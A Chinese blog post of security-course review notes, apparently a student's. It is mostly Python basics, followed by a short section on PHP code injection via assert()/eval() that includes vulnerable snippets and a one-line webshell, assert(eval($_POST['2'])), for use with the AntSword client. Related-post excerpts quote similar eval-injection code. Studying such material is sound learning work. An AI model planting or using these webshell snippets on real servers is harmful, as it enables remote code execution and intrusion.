安全课复习(五)

已于 2022-07-26 10:55:54 修改
阅读量216 收藏
点赞数
分类专栏: 笔记 作业 文章标签: python numpy
于 2022-07-26 10:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53284312/article/details/125987815
版权

一、python知识点总结

人生苦短,我用python

python是一种解释型,面向对象,动态数据类型的弱类型高级程序设计语言
特点:

优点:
	1,语法简单 
	 Python 不要求在每个语句的最后写分号,当然写上也没错;
	 定义变量时不需要指明类型,甚至可以给同一个变量赋值不同类型的数据。
	2,Python 是开源的
	3,Python 是解释型语言,能跨平台,给其他语言当脚本使用
	4,Python 是面向对象的编程语言
	5,Python 功能强大(模块众多)
缺点:
	1,运行速度慢
	2,代码加密困难
	3,强制缩进
	4,单行语句 
	由于Python可以在尾部不写分号,所以一行只能有一条语句。

执行 Python 语法
可以直接在命令行中编写执行 Python 的语法
在这里插入图片描述
Python 缩进
缩进指的是代码行开头的空格。
在其他编程语言中,代码缩进仅出于可读性的考虑,而 Python 中的缩进非常重要。
在这里插入图片描述
但如果不缩进,就会报错。
在这里插入图片描述
必须在同一代码块中使用相同数量的空格,否则 Python 会出错
在这里插入图片描述
Python 变量

实例
	x = 10
	y = "Bill"
	print(x)
	print(y)

Python 变量命名规则:

变量名必须以字母或下划线字符开头
变量名称不能以数字开头
变量名只能包含字母数字字符和下划线(A-z、0-9 和 _)
变量名称区分大小写(age、Age 和 AGE 是三个不同的变量)

向多个变量赋值

Python 允许您在一行中为多个变量赋值
	x, y, z = "Orange", "Banana", "Cherry"
	print(x)
	print(y)
	print(z)
可以在一行中为多个变量分配相同的值
	x = y = z = "Orange"
print(x)
print(y)
print(z)

全局变量

在函数内部创建一个与全局变量同名的变量:
如果在函数内部创建具有相同名称的变量,则该变量将是局部变量,并且只能在函数内部使用。具有相同名称的全局变量将保留原样,并拥有原始值。
例:
x = "awesome"

def myfunc():
 x = "fantastic"
 print("Python is " + x)

myfunc()

print("Python is " + x)

Python 数据类型

文本类型:	str
数值类型:	int, float, complex
序列类型:	list, tuple, range
映射类型:	dict
集合类型:	set, frozenset
布尔类型:	bool
二进制类型:	bytes, bytearray, memoryview

获取数据类型
打印变量 x 的数据类型:
	x = 10
	print(type(x))

Python 列表

Python 集合(数组)

Python 编程语言中有四种集合数据类型:
	列表(List)是一种有序和可更改的集合。允许重复的成员。
	元组(Tuple)是一种有序且不可更改的集合。允许重复的成员。
	集合(Set)是一个无序和无索引的集合。没有重复的成员。
	词典(Dictionary)是一个无序,可变和有索引的集合。没有重复的成员。
	
	您可以通过引用索引号来访问列表项:
	打印列表的第二项:
		thislist = ["apple", "banana", "cherry"]
		print(thislist[1])
	负的索引
		负索引表示从末尾开始,-1 表示最后一个项目,-2 表示倒数第二个项目,依此类推。

在这里插入图片描述

*Python 字典
字典是一个无序、可变和有索引的集合。在 Python 中,字典用花括号编写,拥有键和值。
保时捷 911 1963
thisdict = {
“brand”: “Porsche”,
“model”: “911”,
“year”: 1963
}
print(thisdict)
在这里插入图片描述
Python 条件和 If 语句

a = 10
b = 6
if b > a:
	print("b is greater than a")
elif a == b:
	print("a and b are equal")
else:
	print("a is greater than b")

循环
While 循环
之前写的python作业在这里插入图片描述for循环
在这里插入图片描述
Python 类和对象

创建类:
	使用名为 x 的属性,创建一个名为 MyClass 的类:
		class MyClass:
		x = 5
创建对象:
	创建一个名为 p1 的对象,并打印 x 的值:
		p1 = MyClass()
		print(p1.x)
__init__() 函数
	使用 __init__() 函数将值赋给对象属性,或者在创建对象时需要执行的其他操作
		创建名为 Person 的类,使用 __init__() 函数为 name 和 age 赋值:

class Person:
  def __init__(self, name, age):
 	self.name = name
	self.age = age

p1 = Person("Bill", 63)

print(p1.name)
print(p1.age)

在这里插入图片描述
Python 迭代器
迭代器是一种对象,该对象包含值的可计数数字。
迭代器是可迭代的对象,这意味着您可以遍历所有值。
在 Python 中,迭代器是实现迭代器协议的对象,它包含方法 iter() 和 next()。
列表、元组、字典和集合都是可迭代的对象。它们是可迭代的容器,您可以从中获取迭代器(Iterator)。

例:
	mytuple = ("apple", "banana", "cherry")
	myit = iter(mytuple)

	print(next(myit))
	print(next(myit))
	print(next(myit))

在这里插入图片描述

二、assert利用蚁剑登录

1,assert()
	<?php

		$str = $_GET['input'];
		assert($str);

	?>
2,eval()
把字符串 code 作为PHP代码执行。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。

	<?php

	 $code = $_GET['code'];
	 eval($code);

	?>
注意:eval 是一个语言构造器而不是一个函数,不能被可变函数调用。
构造木马:assert(eval($_POST['2']));
![在这里插入图片描述](https://img-blog.csdnimg.cn/7b1f39263e9f4570b0793ad03eea3e68.png)

default 不推荐使用,我们就用base64编码
在这里插入图片描述
可以设置代理
在这里插入图片描述

故ོ渊ꦿ℘゜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程代码执行RCE
7hinkSource的博客
08-18 309
条件 程序中含有可以执行php代码的函数或者语言结构 传入的参数可控,可直接修改或影响 导致代码注入的函数 eval():将字符串当做php代码执行 <?php if(isset($_GET['code'])){ $code=$_GET['code']; eval($code); } ?>//?code=phpinfo(); assert():将字符串当做php代码执行 <?php if(isset($_GET['code'])){ $code=$_GET['code'
【PHP代码注入】PHP代码注入漏洞
cc
03-06 6165
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
热门推荐
羽的博客
10-18 1万+
题目例子 <?php error_reporting(0); highlight_file(__FILE__); $code=$_GET['code']; if(preg_match('/[a-z0-9]/i',$code)){ die('hacker'); } eval($code); 我们下面以命令system('ls')为例 一、异或 <?php /*author yu22x*/ $myfile = fopen("xor_rce.txt", "w"); $contents="
[极客大挑战 2019]RCE ME
06-29 182
打开后是源码,进行源码审计。 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
PHP代码注入详解
Zeker62的博客
08-16 5190
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP语
【网络】网络安全技术期末复习题.doc
06-18
网络安全技术期末复习题 本资源摘要信息涵盖了网络安全技术的多个方面,包括网络攻击、密码技术、身份验证、访问控制、恶意代码等。 网络攻击 * 黑客攻击:来自于系统外部或内部的攻击者冒充为网络的合法用户获得...
计算机专业复习总结.rar
10-14
"计算机专业复习总结.rar" 这个压缩包文件集合了核心程的重要知识点,包括机组(计算机组成原理)、数据结构、操作系统以及数学思维的相关内容。这些主题是计算机科学教育的基础,对于理解和解决实际问题至关...
信息安全概论-复习2020.6.pdf
03-19
信息安全概论复习PPT
家庭电路和安全用电复习PPT件.pptx
10-07
家庭电路和安全用电复习PPT件.pptx
中国矿业大学-信安专业-信息系统安全期末重点复习笔记
01-23
信息系统安全笔记 本笔记涵盖了信息系统安全的主要概念和技术,包括机密性、完整性、可用性、可靠性、不可抵赖性等安全属性。同时,笔记还涉及到漏洞扫描、补丁升级、安全管理、访问控制、身份认证、加密和解密、...
无数字字母webshell之上传临时文件RCE
snowlyzz的博客
08-11 889
新姿势,上传临时文件rce
RCE-远程代码执行漏洞
最新发布
2301_80661529的博客
03-10 1010
远程代码执行(Remote Code Execution,RCE)是一种严重的安全漏洞,允许攻击者在目标服务器或应用程序上执行任意代码。这种漏洞的出现通常源于以下几个方面的缺陷:用户输入未经过滤或验证:当服务器端应用程序未能正确验证用户提交的数据,如HTTP请求参数、文件上传内容、数据库查询语句等,攻击者可能会将恶意代码注入到这些输入中。代码执行功能的设计缺陷:有些系统或应用提供了执行代码的接口,如PHP的函数、Java的反序列化漏洞等,若未做足够的安全防护,攻击者可通过操纵输入使得这些接口执行恶意代码。组
【CyberSecurityLearning 58】PHP代码注入
_Co1a
04-06 633
目录 PHP 代码注入 原理以及成因 漏洞危害 介绍相关函数和语句 * eval() * assert() * preg_replace() * call_user_func() * 动态函数$a($b) 漏洞利用 * 直接获取Shell * 获取当前文件的绝对路径 * 读文件 * 写文件 防御方法 实战:Seacmsv6.26 命令执行 PHP 代码注入 RCE(remote code execute远程代码执行/注入) 原理以及成因 PHP 代码执行...
无参数RCE
m0_62422842的博客
05-11 1540
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
PHP 代码注入知识点总结
千寻的博客
02-10 2152
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法 第一章 概述 第一节 原理以及...
【PHP代码注入】PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 7215
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
XSS基础——xsslabs通关挑战
weixin_53284312的博客
02-18 3158
xss基础——xsslabs 闯关
2021-01-16
weixin_53284312的博客
01-16 3039
linux 1.创建目录mnt 在/mnt下创建boot和sysroot目录 在/mnt/boot下创建grub目录 在/mnt/sysroot下创建proc,sys,bin,sbin,lib,usr,varetc.dev,home,root,tmp 在/mnt/sysroot/usr下创建bin,sbin,lib在/mnt/sysroot/lib下创建modules 在/mnt/sysroot/var下创建run,log,lock 在/mnt/sysroot/etc下创建init.d 2.创建目录/te
Nginx目录穿越漏洞
weixin_53284312的博客
12-11 2527
Nginx目录穿越漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值